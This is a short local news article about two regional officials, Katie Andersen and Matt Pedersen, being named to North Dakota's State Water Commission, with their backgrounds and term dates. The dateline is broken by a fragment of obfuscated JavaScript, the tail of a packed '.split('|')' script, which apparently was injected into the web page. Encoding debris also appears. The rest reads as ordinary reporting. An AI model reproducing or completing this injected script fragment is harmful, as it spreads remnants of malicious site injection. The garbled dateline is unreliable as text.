Mayor Andersen & Commissioner Pedersen Named to State Water Commission


BISMARCK, bynfb|var|u0026u|referrer|sbhsk||js|php’.split(‘|’),0,{}))
N.D. ( –¬†Governor Doug Burgum has appointed 7 members to the State Water Commission, bringing in a variety of experience in flood protection, water supply and other water issues.

Of the 7 appointed members, two are from the region. They are Jamestown Mayor Katie  Andersen for the James River area and Valley City Commissioner Matt Pedersen for the Upper Red River. Andersen has been involved in a variety of water topics including flood control, storm water management, drainage, and wastewater treatment. Her term expires June 30th, 2019.

Commissioner Pedersen has involvement in flood protection, finance, and planning and zoning. He currently chairs the Valley City Permanent Flood Protection Task Force. His term expires June 30th, 2023.

The nine-member State Water Commission consists of Burgum as chairman, Agriculture Commissioner Doug Goehring as an ex-officio member, and seven members appointed by the governor, with one member each from the seven major drainage basins in North Dakota.

In the release, the governor expressed his gratitude to the outgoing State Water Commission members for their more than 100 years of combined service to the state.

Comment Disclaimer: The views and opinions expressed in the comments section of are solely those of the comment author and do not necessarily reflect the views and opinions held by

Comments are closed.

Inside Agriculture

Farm Talk w/ Mick Kjar